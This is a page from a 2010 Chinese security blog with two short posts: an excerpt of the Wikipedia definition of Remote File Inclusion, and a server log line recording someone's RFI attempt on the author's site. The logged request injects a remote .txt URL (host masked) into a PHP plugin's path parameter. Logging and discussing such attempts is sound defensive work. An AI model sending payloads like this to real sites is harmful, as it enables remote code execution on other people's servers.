Blast's Security

Blast's Security Lab

[置顶] 9.10~9.30 博客暂停常规更新

2010年2月19日

什么是RFI

来源:http://en.wikipedia.org/wiki/Remote_File_Inclusion
有一部分翻译的可能不准确,只是为了大致的说明一下什么是RFI

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
...

>>>我要检查全文,看看这家伙有没有偷懒!

Tags: rfi  RemoteFileInclusion  
发布:blast | 分类:其他信息 | 评论:0 | 引用:0 | 浏览:

2010年2月10日

rfi

看日志……有个人真闲的没事干来rfi我

2010-02-09 20:34:56 GET /list/2010125.htm++/skin_shop/standard/3_plugin_twindow/twindow_notice.php shop_this_skin_path=http://www.************/media/id1.txt?? 81.26.21

>>>我要检查全文,看看这家伙有没有偷懒!

Tags: rfi  
发布:blast | 分类:其他信息 | 评论:0 | 引用:0 | 浏览:
分页:« 首页...«1»...尾页 »

Copyright, 2004-2010 Blast Software, all rights reserved.
皖ICP备09016542号

View Stats